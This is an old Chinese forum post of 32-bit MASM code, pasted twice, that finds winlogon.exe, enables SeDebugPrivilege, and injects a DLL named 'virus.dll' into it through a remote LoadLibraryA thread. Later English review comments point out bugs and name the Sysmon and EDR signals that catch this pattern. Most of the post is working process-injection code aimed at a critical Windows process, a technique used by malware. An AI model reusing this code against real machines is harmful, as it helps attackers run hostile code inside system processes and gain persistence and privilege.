是不是原创?远程线程注入应用2则代码
发表于: 2006-3-18 23:13 4686
; Syntax: MASM (Intel operand order). Target: 32-bit x86 Windows. ABI: stdcall.
; Imports: kernel32 (process/thread/memory APIs), user32 (MessageBox),
; advapi32 (token/privilege APIs).
.386
.model flat, stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
; CTEXT — emit a zero-terminated string into the CONST (read-only) segment
; and expand to its OFFSET, so a literal can be passed directly as an
; argument. An empty argument list yields a single 0 byte.
CTEXT MACRO y:VARARG
LOCAL sym
CONST segment
IFIDNI <y>,<>
sym db 0                        ; empty string: terminator only
ELSE
sym db y,0                      ; string bytes followed by the terminator
ENDIF
CONST ends
EXITM <OFFSET sym>
ENDM
.data
hWinlogon dd ?                  ; process id of the matched winlogon.exe; 0 = not found. NOTE(review): the caller's == 0 test depends on '?' in .data assembling to zero — confirm
szText db "winlogon.exe",0      ; image name searched for by _GetProcessList (case-sensitive prefix compare)
szDll db "virus.dll",0          ; string handed to the remote LoadLibraryA; a bare file name, so the target process's DLL search order decides what loads
.code
;-----------------------------------------------------------------------
; _GetProcessList — find the first process whose image name begins with
; szText ("winlogon.exe") and store its id in hWinlogon.
; Pseudo-C: void _GetProcessList(void)
; In:    none (reads szText)
; Out:   hWinlogon = th32ProcessID of the first match; left untouched when
;        nothing matches, so the caller's hWinlogon == 0 test relies on the
;        variable starting at zero.
; Clobb: EAX, ECX, ESI, EDI, flags. NOTE(review): ESI/EDI are callee-saved
;        under stdcall and are not preserved here; harmless for the single
;        caller (start) but not reusable as-is.
; NOTE(review): only lstrlen(szText) bytes are compared and the compare is
;        case-sensitive, so this is a prefix match ("winlogon.exe.bak"
;        would also match; "WINLOGON.EXE" would not). REPE CMPS assumes DF
;        is clear, which the Win32 ABI requires across API calls.
;-----------------------------------------------------------------------
_GetProcessList proc
local @stProcess:PROCESSENTRY32
local @hSnapShot,@dwszlen
invoke lstrlen, addr szText
mov @dwszlen, eax               ; number of bytes to compare per entry
invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess   ; required by Process32First/Next
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax              ; NOTE(review): INVALID_HANDLE_VALUE is not checked; Process32First then fails and the loop is skipped
invoke Process32First,@hSnapShot,addr @stProcess
.while eax                      ; eax = BOOL from Process32First/Process32Next
mov edi, offset szText
lea esi, @stProcess.szExeFile
mov ecx, @dwszlen
REPE CMPS BYTE PTR ES:[EDI],BYTE PTR [ESI]   ; compare the first @dwszlen bytes; ZF set when all equal
JE getid
invoke Process32Next,@hSnapShot,addr @stProcess
.endw
invoke CloseHandle,@hSnapShot
ret                             ; no match: hWinlogon is left unchanged
getid:
mov eax, @stProcess.th32ProcessID
mov hWinlogon, eax              ; publish the matched pid
invoke CloseHandle,@hSnapShot
ret
_GetProcessList endp
;-----------------------------------------------------------------------
; start — program entry point.
; Locates winlogon.exe, calls l11111(hWinlogon, szDll) and shows a
; "success" message box before exiting.
; NOTE(review): the result of l11111 (EAX: 1 = injected, 0 = failed) is
; never tested, so the success message is shown even when the call failed.
; The target (winlogon.exe) and payload name (virus.dll) make the intent
; plain; OpenProcess/CreateRemoteThread toward winlogon.exe is exactly the
; access pattern EDR and Sysmon ProcessAccess/CreateRemoteThread telemetry
; are tuned to flag.
;-----------------------------------------------------------------------
start:
invoke _GetProcessList
.if hWinlogon == 0              ; no matching process (relies on hWinlogon starting at zero)
invoke MessageBox, NULL, CTEXT("没得到winlogon进程id"), CTEXT("失败"), MB_OK   ; "could not get the winlogon process id" / "failed"
invoke ExitProcess,NULL
.endif
;push CTEXT("C:\\virus\\qopop.dll") ;dll name (absolute-path variant, left disabled)
push offset szDll               ; arg 2: dllPath
push hWinlogon                  ; arg 1: pid
call l11111                     ; stdcall; l11111 pops its own 8 bytes of arguments
;invoke l11111, hWinlogon, addr szDll   ; (invoke form, left disabled)
invoke MessageBox, NULL, CTEXT("成功注入了dll"), CTEXT("成功"), MB_OK   ; "dll injected" / "success" — shown unconditionally, EAX is not checked
invoke ExitProcess,NULL
;-----------------------------------------------------------------------
; l11111 — open a process and load a DLL into it via a remote thread
; Pseudo-C: int __stdcall l11111(DWORD pid, const char *dllPath)
; ABI:   stdcall, two dword stack args, RETN 8 cleans them
; In:    [ESP+4] = target process id, [ESP+8] = pointer to DLL path string
; Out:   EAX = 1 if the remote LoadLibraryA thread was created and waited
;              on; 0 on any failure (pid 0, l22222 failed, OpenProcess,
;              VirtualAllocEx, WriteProcessMemory, GetProcAddress or
;              CreateRemoteThread failed)
; Stack: two dword locals created with PUSH ECX on entry; EBP holds the
;        constant 0 throughout and is not a frame pointer
; Saves: EBP, EDI, EBX, ESI (restored before return)
; NOTE(review): the numeric labels (L011, L013, ...) and the commented-out
;        absolute addresses below suggest this was re-assembled from a
;        disassembly rather than written from scratch.
; Detection: OpenProcess with VM_OPERATION|VM_WRITE|CREATE_THREAD on
;        winlogon.exe, VirtualAllocEx + WriteProcessMemory, then
;        CreateRemoteThread whose start address is kernel32!LoadLibraryA
;        is the textbook DLL-injection sequence; Sysmon ProcessAccess
;        (event 10) and CreateRemoteThread (event 8) and EDR hooks on
;        these APIs are where it is normally caught.
;-----------------------------------------------------------------------
l11111:
PUSH ECX                        ; local slot1 (becomes [ESP+8] after PUSH EBP); zeroed below, read back at L068
PUSH ECX                        ; local slot2 (becomes [ESP+4]); result flag, 0 or 1
PUSH EBP
XOR EBP,EBP                     ; EBP = 0, used as NULL/FALSE for the rest of the routine
; stack: [ESP]=saved EBP [ESP+4]=slot2 [ESP+8]=slot1 [ESP+0Ch]=ret [ESP+10h]=pid [ESP+14h]=dllPath
CMP [ESP+10h],EBP               ; pid == 0?
JE L011                         ; -> return 0
MOV [ESP+4h],EBP                ; result flag = 0
MOV [ESP+8h],EBP                ; slot1 = 0 (later loaded into ESI to mean "no thread handle")
CALL l22222                     ; try to enable SeDebugPrivilege in this process's token
TEST EAX,EAX
JNZ L013
L011:
XOR EAX,EAX                     ; return 0
JMP L084
L013:
PUSH EDI
; stack: [ESP]=saved EDI [ESP+4]=saved EBP [ESP+8]=slot2 [ESP+0Ch]=slot1 [ESP+10h]=ret [ESP+14h]=pid [ESP+18h]=dllPath
PUSH DWORD PTR [ESP+14h]        ; dwProcessId = pid
;MOV DWORD PTR [10083004],1     ; (absolute-address write from the original disassembly; left disabled)
PUSH EBP                        ; bInheritHandle = FALSE
PUSH 42Ah                       ; dwDesiredAccess = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION
CALL OpenProcess
MOV EDI,EAX                     ; EDI = hProcess
CMP EDI,EBP
JE L082                         ; OpenProcess failed -> return result flag (0)
PUSH EBX
PUSH ESI
; stack: [ESP]=saved ESI [ESP+4]=saved EBX [ESP+8]=saved EDI [ESP+0Ch]=saved EBP [ESP+10h]=slot2 [ESP+14h]=slot1 [ESP+18h]=ret [ESP+1Ch]=pid [ESP+20h]=dllPath
PUSH DWORD PTR [ESP+20h]        ; dllPath
CALL lstrlenA
PUSH 4                          ; flProtect = PAGE_READWRITE
MOV ESI,EAX
PUSH 1000h                      ; flAllocationType = MEM_COMMIT
INC ESI                         ; ESI = strlen(dllPath) + 1, including the terminator
PUSH ESI                        ; dwSize
PUSH EBP                        ; lpAddress = NULL
PUSH EDI                        ; hProcess
CALL VirtualAllocEx
MOV EBX,EAX                     ; EBX = buffer in the target process for the path
CMP EBX,EBP
JE L078                         ; allocation failed -> close hProcess, return 0
PUSH EBP                        ; lpNumberOfBytesWritten = NULL
PUSH ESI                        ; nSize = len + 1
PUSH DWORD PTR [ESP+28h]        ; lpBuffer = dllPath (the two pushes above moved it from [ESP+20h])
PUSH EBX                        ; lpBaseAddress = remote buffer
PUSH EDI                        ; hProcess
CALL WriteProcessMemory
TEST EAX,EAX
JE L068                         ; write failed -> free remote buffer, return 0
;PUSH 10069298                  ; (absolute string addresses from the original disassembly, replaced by CTEXT below)
;PUSH 1006928C
PUSH CTEXT("LoadLibraryA")      ; lpProcName
push CTEXT("Kernel32")          ; lpModuleName
CALL GetModuleHandleA           ; NOTE(review): a NULL result is not checked before it is passed to GetProcAddress
PUSH EAX                        ; hModule
CALL GetProcAddress             ; EAX = LoadLibraryA as mapped in this process; used as the remote start address, so it assumes kernel32 sits at the same base in the target
CMP EAX,EBP
JE L068                         ; lookup failed -> free remote buffer, return 0
PUSH EBP                        ; lpThreadId = NULL
PUSH EBP                        ; dwCreationFlags = 0
PUSH EBX                        ; lpParameter = remote buffer holding the path
PUSH EAX                        ; lpStartAddress = LoadLibraryA
PUSH EBP                        ; dwStackSize = 0
PUSH EBP                        ; lpThreadAttributes = NULL
PUSH EDI                        ; hProcess
CALL CreateRemoteThread
MOV ESI,EAX                     ; ESI = hThread (0 on failure)
CMP ESI,EBP
JE L069                         ; thread creation failed -> free remote buffer, return 0
PUSH -1                         ; dwMilliseconds = INFINITE: blocks until the remote LoadLibraryA returns (no timeout)
PUSH ESI                        ; hThread
CALL WaitForSingleObject
MOV DWORD PTR [ESP+10h],1       ; result flag (slot2) = 1
JMP L069
L068:
MOV ESI,[ESP+14h]               ; ESI = slot1 (0): no thread handle to close
L069:
PUSH 8000h                      ; dwFreeType = MEM_RELEASE
PUSH EBP                        ; dwSize = 0
PUSH EBX                        ; lpAddress = remote buffer
PUSH EDI                        ; hProcess
CALL VirtualFreeEx
CMP ESI,EBP
JE L078
PUSH ESI
CALL CloseHandle                ; hThread
L078:
PUSH EDI
CALL CloseHandle                ; hProcess
POP ESI
POP EBX
L082:
MOV EAX,[ESP+8]                 ; EAX = result flag (slot2)
POP EDI
L084:
POP EBP
POP ECX                         ; discard the two local slots
POP ECX
RETN 8                          ; stdcall: pop pid and dllPath
;-----------------------------------------------------------------------
; l22222 — enable SeDebugPrivilege in the current process token
; Pseudo-C: int l22222(void)
; ABI:   no arguments, EBP frame with 14h bytes of locals, plain RETN
; Locals: [EBP-4]   = hToken
;         [EBP-14h] = TOKEN_PRIVILEGES.PrivilegeCount
;         [EBP-10h] = TOKEN_PRIVILEGES.Privileges[0].Luid (8 bytes)
;         [EBP-8]   = TOKEN_PRIVILEGES.Privileges[0].Attributes
; Out:   EAX = 1 if AdjustTokenPrivileges returned nonzero, 0 otherwise
; Saves: ESI
; NOTE(review): AdjustTokenPrivileges returns nonzero even when the
;        privilege is not held by the token (GetLastError() ==
;        ERROR_NOT_ALL_ASSIGNED is never inspected), so EAX = 1 does not
;        prove SeDebugPrivilege is enabled; a non-administrator caller
;        proceeds and only fails later at OpenProcess. Enabling
;        SeDebugPrivilege is itself a high-signal event for privilege-use
;        auditing.
;-----------------------------------------------------------------------
l22222:
PUSH EBP
MOV EBP,ESP
SUB ESP,14h                     ; reserve hToken + TOKEN_PRIVILEGES
LEA EAX,[EBP-4]
PUSH EAX                        ; TokenHandle = &hToken
PUSH 28h                        ; DesiredAccess = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
CALL GetCurrentProcess
PUSH EAX                        ; ProcessHandle
CALL OpenProcessToken
TEST EAX,EAX
JE L039                         ; no token opened -> return 0 without CloseHandle
PUSH ESI
LEA EAX,[EBP-10h]
PUSH EAX                        ; lpLuid = &Privileges[0].Luid
;PUSH 10069200                  ; (absolute string address from the original disassembly, replaced by CTEXT below)
PUSH CTEXT("SeDebugPrivilege")  ; lpName
XOR ESI,ESI                     ; ESI = 0: serves as the NULL/0 arguments and as the return value until success
PUSH ESI                        ; lpSystemName = NULL (local machine)
CALL LookupPrivilegeValueA
TEST EAX,EAX
JE L033                         ; lookup failed -> close token, return 0
PUSH ESI                        ; ReturnLength = NULL
PUSH ESI                        ; PreviousState = NULL
PUSH ESI                        ; BufferLength = 0
LEA EAX,[EBP-14h]
PUSH EAX                        ; NewState = &TOKEN_PRIVILEGES
PUSH ESI                        ; DisableAllPrivileges = FALSE
PUSH DWORD PTR [EBP-4]          ; TokenHandle
MOV DWORD PTR [EBP-14h],1       ; PrivilegeCount = 1 (filled in after the pushes; the callee reads the struct, so order is fine)
MOV DWORD PTR [EBP-8],2         ; Attributes = SE_PRIVILEGE_ENABLED
CALL AdjustTokenPrivileges
TEST EAX,EAX
JE L033
INC ESI                         ; ESI = 1: report success (see NOTE above on what this does not guarantee)
L033:
PUSH DWORD PTR [EBP-4]
CALL CloseHandle                ; hToken
MOV EAX,ESI
POP ESI
LEAVE
RETN
L039:
XOR EAX,EAX                     ; OpenProcessToken failed
LEAVE
RETN
end start
; Syntax: MASM (Intel operand order). Target: 32-bit x86 Windows. ABI: stdcall.
; Imports: kernel32 (process/thread/memory APIs), user32 (MessageBox),
; advapi32 (token/privilege APIs).
; NOTE(review): this second copy starts at .model without the .386 line the
; first copy has; presumably lost in the paste — .model flat needs a
; 386-or-later processor directive before it.
.model flat, stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
; CTEXT — emit a zero-terminated string into the CONST (read-only) segment
; and expand to its OFFSET, so a literal can be passed directly as an
; argument. An empty argument list yields a single 0 byte.
CTEXT MACRO y:VARARG
LOCAL sym
CONST segment
IFIDNI <y>,<>
sym db 0                        ; empty string: terminator only
ELSE
sym db y,0                      ; string bytes followed by the terminator
ENDIF
CONST ends
EXITM <OFFSET sym>
ENDM
.data
hWinlogon dd ?                  ; process id of the matched winlogon.exe; 0 = not found. NOTE(review): the caller's == 0 test depends on '?' in .data assembling to zero — confirm
szText db "winlogon.exe",0      ; image name searched for by _GetProcessList (case-sensitive prefix compare)
szDll db "virus.dll",0          ; string handed to the remote LoadLibraryA; a bare file name, so the target process's DLL search order decides what loads
.code
;-----------------------------------------------------------------------
; _GetProcessList — find the first process whose image name begins with
; szText ("winlogon.exe") and store its id in hWinlogon.
; Pseudo-C: void _GetProcessList(void)
; In:    none (reads szText)
; Out:   hWinlogon = th32ProcessID of the first match; left untouched when
;        nothing matches, so the caller's hWinlogon == 0 test relies on the
;        variable starting at zero.
; Clobb: EAX, ECX, ESI, EDI, flags. NOTE(review): ESI/EDI are callee-saved
;        under stdcall and are not preserved here; harmless for the single
;        caller (start) but not reusable as-is.
; NOTE(review): only lstrlen(szText) bytes are compared and the compare is
;        case-sensitive, so this is a prefix match ("winlogon.exe.bak"
;        would also match; "WINLOGON.EXE" would not). REPE CMPS assumes DF
;        is clear, which the Win32 ABI requires across API calls.
;-----------------------------------------------------------------------
_GetProcessList proc
local @stProcess:PROCESSENTRY32
local @hSnapShot,@dwszlen
invoke lstrlen, addr szText
mov @dwszlen, eax               ; number of bytes to compare per entry
invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess   ; required by Process32First/Next
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax              ; NOTE(review): INVALID_HANDLE_VALUE is not checked; Process32First then fails and the loop is skipped
invoke Process32First,@hSnapShot,addr @stProcess
.while eax                      ; eax = BOOL from Process32First/Process32Next
mov edi, offset szText
lea esi, @stProcess.szExeFile
mov ecx, @dwszlen
REPE CMPS BYTE PTR ES:[EDI],BYTE PTR [ESI]   ; compare the first @dwszlen bytes; ZF set when all equal
JE getid
invoke Process32Next,@hSnapShot,addr @stProcess
.endw
invoke CloseHandle,@hSnapShot
ret                             ; no match: hWinlogon is left unchanged
getid:
mov eax, @stProcess.th32ProcessID
mov hWinlogon, eax              ; publish the matched pid
invoke CloseHandle,@hSnapShot
ret
_GetProcessList endp
;-----------------------------------------------------------------------
; start — program entry point.
; Locates winlogon.exe, calls l11111(hWinlogon, szDll) and shows a
; "success" message box before exiting.
; NOTE(review): the result of l11111 (EAX: 1 = injected, 0 = failed) is
; never tested, so the success message is shown even when the call failed.
; The target (winlogon.exe) and payload name (virus.dll) make the intent
; plain; OpenProcess/CreateRemoteThread toward winlogon.exe is exactly the
; access pattern EDR and Sysmon ProcessAccess/CreateRemoteThread telemetry
; are tuned to flag.
;-----------------------------------------------------------------------
start:
invoke _GetProcessList
.if hWinlogon == 0              ; no matching process (relies on hWinlogon starting at zero)
invoke MessageBox, NULL, CTEXT("没得到winlogon进程id"), CTEXT("失败"), MB_OK   ; "could not get the winlogon process id" / "failed"
invoke ExitProcess,NULL
.endif
;push CTEXT("C:\\virus\\qopop.dll") ;dll name (absolute-path variant, left disabled)
push offset szDll               ; arg 2: dllPath
push hWinlogon                  ; arg 1: pid
call l11111                     ; stdcall; l11111 pops its own 8 bytes of arguments
;invoke l11111, hWinlogon, addr szDll   ; (invoke form, left disabled)
invoke MessageBox, NULL, CTEXT("成功注入了dll"), CTEXT("成功"), MB_OK   ; "dll injected" / "success" — shown unconditionally, EAX is not checked
invoke ExitProcess,NULL
;-----------------------------------------------------------------------
; l11111 — open a process and load a DLL into it via a remote thread
; Pseudo-C: int __stdcall l11111(DWORD pid, const char *dllPath)
; ABI:   stdcall, two dword stack args, RETN 8 cleans them
; In:    [ESP+4] = target process id, [ESP+8] = pointer to DLL path string
; Out:   EAX = 1 if the remote LoadLibraryA thread was created and waited
;              on; 0 on any failure (pid 0, l22222 failed, OpenProcess,
;              VirtualAllocEx, WriteProcessMemory, GetProcAddress or
;              CreateRemoteThread failed)
; Stack: two dword locals created with PUSH ECX on entry; EBP holds the
;        constant 0 throughout and is not a frame pointer
; Saves: EBP, EDI, EBX, ESI (restored before return)
; NOTE(review): the numeric labels (L011, L013, ...) and the commented-out
;        absolute addresses below suggest this was re-assembled from a
;        disassembly rather than written from scratch.
; Detection: OpenProcess with VM_OPERATION|VM_WRITE|CREATE_THREAD on
;        winlogon.exe, VirtualAllocEx + WriteProcessMemory, then
;        CreateRemoteThread whose start address is kernel32!LoadLibraryA
;        is the textbook DLL-injection sequence; Sysmon ProcessAccess
;        (event 10) and CreateRemoteThread (event 8) and EDR hooks on
;        these APIs are where it is normally caught.
;-----------------------------------------------------------------------
l11111:
PUSH ECX                        ; local slot1 (becomes [ESP+8] after PUSH EBP); zeroed below, read back at L068
PUSH ECX                        ; local slot2 (becomes [ESP+4]); result flag, 0 or 1
PUSH EBP
XOR EBP,EBP                     ; EBP = 0, used as NULL/FALSE for the rest of the routine
; stack: [ESP]=saved EBP [ESP+4]=slot2 [ESP+8]=slot1 [ESP+0Ch]=ret [ESP+10h]=pid [ESP+14h]=dllPath
CMP [ESP+10h],EBP               ; pid == 0?
JE L011                         ; -> return 0
MOV [ESP+4h],EBP                ; result flag = 0
MOV [ESP+8h],EBP                ; slot1 = 0 (later loaded into ESI to mean "no thread handle")
CALL l22222                     ; try to enable SeDebugPrivilege in this process's token
TEST EAX,EAX
JNZ L013
L011:
XOR EAX,EAX                     ; return 0
JMP L084
L013:
PUSH EDI
; stack: [ESP]=saved EDI [ESP+4]=saved EBP [ESP+8]=slot2 [ESP+0Ch]=slot1 [ESP+10h]=ret [ESP+14h]=pid [ESP+18h]=dllPath
PUSH DWORD PTR [ESP+14h]        ; dwProcessId = pid
;MOV DWORD PTR [10083004],1     ; (absolute-address write from the original disassembly; left disabled)
PUSH EBP                        ; bInheritHandle = FALSE
PUSH 42Ah                       ; dwDesiredAccess = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION
CALL OpenProcess
MOV EDI,EAX                     ; EDI = hProcess
CMP EDI,EBP
JE L082                         ; OpenProcess failed -> return result flag (0)
PUSH EBX
PUSH ESI
; stack: [ESP]=saved ESI [ESP+4]=saved EBX [ESP+8]=saved EDI [ESP+0Ch]=saved EBP [ESP+10h]=slot2 [ESP+14h]=slot1 [ESP+18h]=ret [ESP+1Ch]=pid [ESP+20h]=dllPath
PUSH DWORD PTR [ESP+20h]        ; dllPath
CALL lstrlenA
PUSH 4                          ; flProtect = PAGE_READWRITE
MOV ESI,EAX
PUSH 1000h                      ; flAllocationType = MEM_COMMIT
INC ESI                         ; ESI = strlen(dllPath) + 1, including the terminator
PUSH ESI                        ; dwSize
PUSH EBP                        ; lpAddress = NULL
PUSH EDI                        ; hProcess
CALL VirtualAllocEx
MOV EBX,EAX                     ; EBX = buffer in the target process for the path
CMP EBX,EBP
JE L078                         ; allocation failed -> close hProcess, return 0
PUSH EBP                        ; lpNumberOfBytesWritten = NULL
PUSH ESI                        ; nSize = len + 1
PUSH DWORD PTR [ESP+28h]        ; lpBuffer = dllPath (the two pushes above moved it from [ESP+20h])
PUSH EBX                        ; lpBaseAddress = remote buffer
PUSH EDI                        ; hProcess
CALL WriteProcessMemory
TEST EAX,EAX
JE L068                         ; write failed -> free remote buffer, return 0
;PUSH 10069298                  ; (absolute string addresses from the original disassembly, replaced by CTEXT below)
;PUSH 1006928C
PUSH CTEXT("LoadLibraryA")      ; lpProcName
push CTEXT("Kernel32")          ; lpModuleName
CALL GetModuleHandleA           ; NOTE(review): a NULL result is not checked before it is passed to GetProcAddress
PUSH EAX                        ; hModule
CALL GetProcAddress             ; EAX = LoadLibraryA as mapped in this process; used as the remote start address, so it assumes kernel32 sits at the same base in the target
CMP EAX,EBP
JE L068                         ; lookup failed -> free remote buffer, return 0
PUSH EBP                        ; lpThreadId = NULL
PUSH EBP                        ; dwCreationFlags = 0
PUSH EBX                        ; lpParameter = remote buffer holding the path
PUSH EAX                        ; lpStartAddress = LoadLibraryA
PUSH EBP                        ; dwStackSize = 0
PUSH EBP                        ; lpThreadAttributes = NULL
PUSH EDI                        ; hProcess
CALL CreateRemoteThread
MOV ESI,EAX                     ; ESI = hThread (0 on failure)
CMP ESI,EBP
JE L069                         ; thread creation failed -> free remote buffer, return 0
PUSH -1                         ; dwMilliseconds = INFINITE: blocks until the remote LoadLibraryA returns (no timeout)
PUSH ESI                        ; hThread
CALL WaitForSingleObject
MOV DWORD PTR [ESP+10h],1       ; result flag (slot2) = 1
JMP L069
L068:
MOV ESI,[ESP+14h]               ; ESI = slot1 (0): no thread handle to close
L069:
PUSH 8000h                      ; dwFreeType = MEM_RELEASE
PUSH EBP                        ; dwSize = 0
PUSH EBX                        ; lpAddress = remote buffer
PUSH EDI                        ; hProcess
CALL VirtualFreeEx
CMP ESI,EBP
JE L078
PUSH ESI
CALL CloseHandle                ; hThread
L078:
PUSH EDI
CALL CloseHandle                ; hProcess
POP ESI
POP EBX
L082:
MOV EAX,[ESP+8]                 ; EAX = result flag (slot2)
POP EDI
L084:
POP EBP
POP ECX                         ; discard the two local slots
POP ECX
RETN 8                          ; stdcall: pop pid and dllPath
;-----------------------------------------------------------------------
; l22222 — enable SeDebugPrivilege in the current process token
; Pseudo-C: int l22222(void)
; ABI:   no arguments, EBP frame with 14h bytes of locals, plain RETN
; Locals: [EBP-4]   = hToken
;         [EBP-14h] = TOKEN_PRIVILEGES.PrivilegeCount
;         [EBP-10h] = TOKEN_PRIVILEGES.Privileges[0].Luid (8 bytes)
;         [EBP-8]   = TOKEN_PRIVILEGES.Privileges[0].Attributes
; Out:   EAX = 1 if AdjustTokenPrivileges returned nonzero, 0 otherwise
; Saves: ESI
; NOTE(review): AdjustTokenPrivileges returns nonzero even when the
;        privilege is not held by the token (GetLastError() ==
;        ERROR_NOT_ALL_ASSIGNED is never inspected), so EAX = 1 does not
;        prove SeDebugPrivilege is enabled; a non-administrator caller
;        proceeds and only fails later at OpenProcess. Enabling
;        SeDebugPrivilege is itself a high-signal event for privilege-use
;        auditing.
;-----------------------------------------------------------------------
l22222:
PUSH EBP
MOV EBP,ESP
SUB ESP,14h                     ; reserve hToken + TOKEN_PRIVILEGES
LEA EAX,[EBP-4]
PUSH EAX                        ; TokenHandle = &hToken
PUSH 28h                        ; DesiredAccess = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
CALL GetCurrentProcess
PUSH EAX                        ; ProcessHandle
CALL OpenProcessToken
TEST EAX,EAX
JE L039                         ; no token opened -> return 0 without CloseHandle
PUSH ESI
LEA EAX,[EBP-10h]
PUSH EAX                        ; lpLuid = &Privileges[0].Luid
;PUSH 10069200                  ; (absolute string address from the original disassembly, replaced by CTEXT below)
PUSH CTEXT("SeDebugPrivilege")  ; lpName
XOR ESI,ESI                     ; ESI = 0: serves as the NULL/0 arguments and as the return value until success
PUSH ESI                        ; lpSystemName = NULL (local machine)
CALL LookupPrivilegeValueA
TEST EAX,EAX
JE L033                         ; lookup failed -> close token, return 0
PUSH ESI                        ; ReturnLength = NULL
PUSH ESI                        ; PreviousState = NULL
PUSH ESI                        ; BufferLength = 0
LEA EAX,[EBP-14h]
PUSH EAX                        ; NewState = &TOKEN_PRIVILEGES
PUSH ESI                        ; DisableAllPrivileges = FALSE
PUSH DWORD PTR [EBP-4]          ; TokenHandle
MOV DWORD PTR [EBP-14h],1       ; PrivilegeCount = 1 (filled in after the pushes; the callee reads the struct, so order is fine)
MOV DWORD PTR [EBP-8],2         ; Attributes = SE_PRIVILEGE_ENABLED
CALL AdjustTokenPrivileges
TEST EAX,EAX
JE L033
INC ESI                         ; ESI = 1: report success (see NOTE above on what this does not guarantee)
L033:
PUSH DWORD PTR [EBP-4]
CALL CloseHandle                ; hToken
MOV EAX,ESI
POP ESI
LEAVE
RETN
L039:
XOR EAX,EAX                     ; OpenProcessToken failed
LEAVE
RETN
end start